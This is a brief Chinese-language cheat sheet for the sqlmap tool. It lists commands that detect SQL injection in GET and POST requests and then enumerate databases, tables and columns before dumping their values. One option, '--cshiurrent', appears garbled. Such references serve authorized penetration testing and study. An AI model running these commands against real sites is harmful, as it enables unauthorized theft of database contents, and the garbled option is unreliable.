SQLmap使用:
(1) GET型
* 检查注入点
sqlmap.py -u 网址
* 爆出所有数据库
sqlmap.py -u 网址 --cshiurrent --dbs
* 爆表
sqlmap.py -u 网址 -D 数据库名 --tables
* 爆列
sqlmap.py -u 网址 -D 数据库名 -T 表名 --columns
* 爆值
sqlmap.py -u 网址 -D 数据库名 -T 表名 -C 字段名 --dump
————————————————
(2) POST型
##需要将拦截的包保存到一个文件,对文件进行sqlmap操作##
* 扫描注入类型
payload:python sqlmap.py -r "D:\post.txt"
* 爆出所有数据库
python sqlmap.py -r "D:\post.txt" --dbs
* 爆表
python sqlmap.py -r "D:\post.txt" -D 数据库名 --tables
* 爆列
python sqlmap.py -r "D:\post.txt" -D 数据库名 -T 表名 --columns
* 爆值
python sqlmap.py -r "D:\post.txt" -D 数据库名 -T 表名 -C 字段名 --dump